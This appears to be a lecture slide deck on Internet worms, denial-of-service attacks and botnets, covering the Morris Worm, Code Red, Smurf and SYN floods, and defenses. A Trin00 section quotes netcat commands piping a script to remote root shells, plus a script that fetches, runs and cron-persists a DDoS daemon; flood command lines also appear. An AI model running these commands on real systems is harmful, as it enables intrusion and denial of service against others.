440 likes | 624 Views
Worms, DDOS, and Botnets. Wide-spread Internet attacks. Worms. Active network propagation Replicates (like a virus) Operates independently of users Compromise remote machines Insecure services Copy themselves to that machine. Morris Worm. Released on Nov 2, 1988
E N D
Worms, DDOS, and Botnets Wide-spread Internet attacks
Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromise remote machines • Insecure services • Copy themselves to that machine
Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable
Morris Worm • Where to spread • netstat -r -n • /etc/hosts • Yellow pages distributed hosts file • Tries all local addresses
Morris Worm • Security flaws to exploit • Weak password for rsh • Buffer overflow in fingerd program • Trapdoor in sendmail mail handler • DEBUG mode
Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley
Morris Worm • Effects • Resource exhaustion, disconnection, isolation • $10-100M damage • Bug in the worm • Robert? • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction! • 3 years probation • 400 hours of community service • $10,000 fine
Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Using Microsoft’s Internet Information Server • Using buffer overflows • Propagation • Checks IP addresses on port 80 of the PC to see if the web server is vulnerable
Denial of Service • Loss of “availability” • Regular use is stopped • A more advanced attack • Version 1 is insecure • Version 2 is secure, but backwards compatible • DOS version 2 • Forces people to use version 1 • Attack those people
Old Attacks • Error handling • Failures caused system crashes • Ping of Death • ICMP Packets big enough to fragment • Teardrop • Manipulate the offset in fragmented pkts • Land Attack • Same Source and IP
Old Attacks • Looping • Smurf attack • Ping to broadcast address • echo/chargen • Echo is a service that repeats what you send • Chargen is a service that generates characters • A command (spoofed) from the machine with Echo is sent to the chargen service. • Boom!
DoS Attacks • General security principle • Robustness to normal inputs • Robustness to attacks ≠
SYN/ACK LAND Attack Source IP: 129.107.94.136 Source Port: 22 Dest. IP: 129.107.94.136 Dest. Port: 22 SYN 129.107.94.136
Teardrop Attack • IP fragmentation • Fragment offset • NFB: amount of data in 1st packet Packet 1 More fragments: 1 Frag. offset: 0 Packet 2 Frag. offset: 0 + NFB
Teardrop Attack • Attack • Simply a bad offset Packet 1 More fragments: 1 Frag. offset: 0 Packet 2 Frag. offset: 2354692110
Smurf Attack • ICMP • Ping • Leverage 129.16.33.* Source IP: 129.107.94.136 Ping: 129.16.33.255 129.107.94.136
Network DOS • ARP attacks • Change the router’s advertised Ethernet address to anything else.
Lessons Learned? • Many equivalent attacks today • Look at CERT alerts • Many are DOS vulnerabilities • Usually software errors • We’re still bad at handling malformed inputs • Unnecessary services • Many have been taken away (generally) • More keep popping up
Flooding • A Classic Attack • Just send traffic: mail bomb, SYN floods, ICMP • Generally works • If you block the bad traffic, I’ll flood the blocker • Need to block it from at least 1 hop away
The Attacker’s Problems • Easily Detectable • IP spoofing? • Works less and less (egress filters) • Partial traceback available • Weak • Amazon.com • Built to handle lots of traffic • One flooder is a blip on the radar
BotNets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No intense firewall hacking • or other dangerous, difficult tasks • Software and OS are homogeneous • 10,000 to 1.5 million
Anatomy of a Zombie • What would you put into a bot? • Infect and spread • Covert • Make money
Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundIl.exe (rundIl.exe -- note the ‘eye’) • Check the font in your Windows registry • Connection • E.g. IRC server • Join a secret, password protected channel • Wait for instructions • Download a trojan • Attack on command • with or without trojan
Anatomy of UNIX Zombies • Linux/Solaris • Many root kits and network sniffers available • Automatically • Scan for vulnerable services • Attempt attacks • Open a port to listen for “owned” machines • (e.g., port 1524 “ingresslock” service) • Alternatively mail to a freemail account • Install attackware on these machines
Sample Connections: Trin00 • This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp: • ------------------------------------------------------------------------ • ./trin.sh | nc 128.aaa.167.217 1524 & • ./trin.sh | nc 128.aaa.167.218 1524 & • ./trin.sh | nc 128.aaa.167.219 1524 & • ./trin.sh | nc 128.aaa.187.38 1524 & • ./trin.sh | nc 128.bbb.2.80 1524 & • ./trin.sh | nc 128.bbb.2.81 1524 & • ./trin.sh | nc 128.bbb.2.238 1524 & • ./trin.sh | nc 128.ccc.12.22 1524 & • ./trin.sh | nc 128.ccc.12.50 1524 & • . . . • ------------------------------------------------------------------------
Sample Script • The script "trin.sh", whose output is being piped to these systems, looks like: • ------------------------------------------------------------------------ • #Remote copy of the “leaf” program to an unsuspicious location • echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen” • echo "chmod +x /usr/sbin/rpc.listen”#Make it executable • echo "echo launching trinoo" • echo "/usr/sbin/rpc.listen”#Run “leaf” • #Set it up as a Cron job. Restart it every minute. • echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron” • echo "crontab cron" • echo "echo launched" • echo "exit"
Attack Topology Daemons Masters Attackers dns1.uta.edu sCUdATK www3.security.com mail.company.com ^^hATEr^^
Attack Topology • Master’s Characteristics • Easy to hide • lots of accounts • lots of traffic • Should use a r00t kit to hide your tracks • Important Systems • Sys admin reluctant to take it down • DNS server, mail server, etc.
New Topologies • Trin00 • IRC: No master to catch • Conficker • Rotating Web sites • Storm • Structured P2P
Other Uses of Botnets • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use
Script Kiddies • Non-expert Attackers • Trin00 and other DDOS attack tools have well-defined signatures • Fixed port numbers • Fixed & clear-text passwords • Known commands • Crontab entries • File locations • Sys Admins can find these • Experts can avoid them
Distributed DOS = DDOS • Step 1 • Get as large a botnet as you can • Step 2 • Flood the target full blast from every zombie • IP spoofing? • Yes: harder to trace back • No: could get blocked by egress filters • No: you didn’t hack the boxes directly; hard to trace.
Methods of Blasting 1 • Brute Force • ping.exe 127.10.10.1 -l 65500 -n 10000 • Send 10K large pings • udp 127.10.10.1 9999999 0 • This sends huge packets, no delay • 1500-byte fragments result • Characteristics • These can be run on Windows cmd line • Pure brute force bandwidth consumption
Real World DDoS 0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0 0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0 0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0 0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0 0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0 0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0 0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661 0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0 0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0 0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0 0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0 0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0 0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0 0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0 0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0
SYN=1, seq=963 SYN=1, seq=382, ack=964 SYN=0, seq=964, ack=383 Methods of Blasting 2 • TCP 3-way handshake State LISTEN SYN_RCVD ESTAB.
SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 Methods of Blasting 2 • TCP 3-way handshake State LISTEN
Methods of Blasting 2 • Server • Enters the SYN_RCVD state • Limited # of connections allowed • Legit users can’t connect • Fix 1: allow more connections • Attack on Fix 1: Memory, processing, and bandwidth • Syn Flood • Open a TCP connection (SYN) • Don’t respond to the SYN/ACK • Repeat!
Methods of Blasting 2 • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back • Unless spoofed IP • But far less than sent, on average
Making $$DDOS$$ Pay • No big targets • Publicity is good marketing but bad for avoiding arrest • Easier to take small targets down • Advertise • Company B would pay to have Company A’s website go down • Extorsion: pay us or else
Defenses • Filtering - how • SYN floods: check for repeated IPs • Often non-production ports • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response can drop by several seconds • Pay the Extortion fees
Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?
Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.
Trapdoors • Examples • Special account to avoid password • Special sequence to avoid access control • Cause of trapdoors • Forgotten • Intentionally left in the program for testing • Intentionally left for maintenance • Intentionally leave them as a covert means of access to the component
Rootkits and Backdoors • Backdoor: an open passage into a system • Ex: A root shell listening on a high port • Usually, it is disguised in some fashion. • Rootkit: a complete backdoor system • used to hide one or more backdoors • modify system logs, binaries, etc., to hide its presence.